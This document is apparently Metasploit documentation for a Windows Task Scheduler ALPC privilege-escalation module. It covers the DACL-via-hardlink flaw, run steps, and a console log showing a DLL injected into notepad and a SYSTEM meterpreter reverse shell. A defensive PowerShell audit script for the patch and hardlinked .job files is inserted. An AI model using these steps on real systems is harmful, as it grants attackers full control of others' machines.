metasploit-gs/documentation/modules/exploit/windows/local/alpc_taskscheduler.md
2018-09-19 10:22:51 -05:00

Description

On vulnerable versions of Windows, the ALPC endpoint method SchRpcSetSecurity, implemented by the Task Scheduler service, can be used to write arbitrary DACLs to .job files located in c:\windows\tasks, because the scheduler does not use impersonation when checking this location. Since users can create files in the c:\windows\tasks folder, a hardlink can be created to a file the user has read access to. After creating the hardlink, the vulnerability can be triggered to set the DACL on the linked file. This module has been tested against Windows 10 Pro x64.

Vulnerable Application

Windows OSes without the KB4457142 patch
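As an added defensive check (not part of the Metasploit module or its documentation), the following PowerShell reports whether the KB4457142 fix is listed on the host and flags any .job file in C:\Windows\Tasks that is a hardlink to a file elsewhere, which is the abuse pattern the description above explains. It assumes an elevated PowerShell session on the host being audited and that fsutil.exe is available; the function names are this example's own.

```powershell
# Added defensive audit script, not part of the Metasploit module.
# Assumptions: elevated PowerShell on the host being audited; fsutil.exe present.

function Test-Kb4457142 {
    # Get-HotFix only lists updates registered as hotfixes. A later cumulative
    # update that supersedes KB4457142 will not appear, so "not listed" means
    # "check the OS build against the current rollup", not "confirmed vulnerable".
    $fix = Get-HotFix -Id 'KB4457142' -ErrorAction SilentlyContinue
    if ($fix) { "KB4457142 installed on $($fix.InstalledOn)" }
    else      { "KB4457142 not listed by Get-HotFix (build $([Environment]::OSVersion.Version))" }
}

function Find-HardlinkedJobFile {
    # A legitimate .job file has exactly one name (itself). Any additional link
    # name, especially one outside the Tasks folder, matches the pattern described
    # above: a DACL written to the .job file lands on the linked target.
    $tasksDir = Join-Path $env:SystemRoot 'Tasks'
    Get-ChildItem -Path $tasksDir -Filter '*.job' -File -ErrorAction SilentlyContinue |
      ForEach-Object {
        $job   = $_.FullName
        $drive = $_.PSDrive.Root.TrimEnd('\')          # e.g. "C:"
        # fsutil prints one link name per line, relative to the volume root,
        # e.g. "\Windows\Tasks\foo.job"; errors such as access denied are discarded.
        $links  = @(& fsutil.exe hardlink list $job 2>$null | Where-Object { $_ })
        $others = @($links | ForEach-Object { $drive + $_ } | Where-Object { $_ -ne $job })
        if ($others.Count -gt 0) {
            # Who holds write rights on the linked target now? That is the
            # end effect of the SchRpcSetSecurity DACL rewrite.
            $writers = (Get-Acl -Path $others[0] -ErrorAction SilentlyContinue).Access |
              Where-Object { $_.AccessControlType -eq 'Allow' -and
                             $_.FileSystemRights -match 'Write|Modify|FullControl' } |
              ForEach-Object { $_.IdentityReference.Value }
            [pscustomobject]@{
                JobFile        = $job
                LinkedTo       = ($others -join '; ')
                WriteAllowedTo = ($writers -join ', ')
            }
        }
      }
}

Test-Kb4457142
$hits = @(Find-HardlinkedJobFile)
if ($hits.Count -eq 0) { "No hardlinked .job files under $env:SystemRoot\Tasks" }
else { $hits | Format-List }
```

A hit is not proof of compromise on its own; compare the linked target and its write-allowed identities against what the build's baseline DACL should be before acting on it.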

Verification Steps

  • Get a meterpreter session on Windows 10 x64
  • use exploit/windows/local/alpc_taskscheduler
  • set session <session>
  • set payload <payload>
  • set lhost <lhost>
  • run
  • Get a session as SYSTEM

Scenarios

Tested on Windows 10 Pro Version 1803 x64

msf5 exploit(windows/local/alpc_taskscheduler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-IPOGIJR\msfdev @ DESKTOP-IPOGIJR  172.22.222.243:4444 -> 172.22.222.200:50490 (172.22.222.200)

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 172.22.222.243:4444 
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Payload (5120 bytes) uploaded on DESKTOP-IPOGIJR to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 3768 launched.
[*] Attempting to change the payload path to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll...
[*] Reflectively injecting the exploit DLL into 3768...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.243:4444 -> 172.22.222.200:50491) at 2018-09-17 17:37:07 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >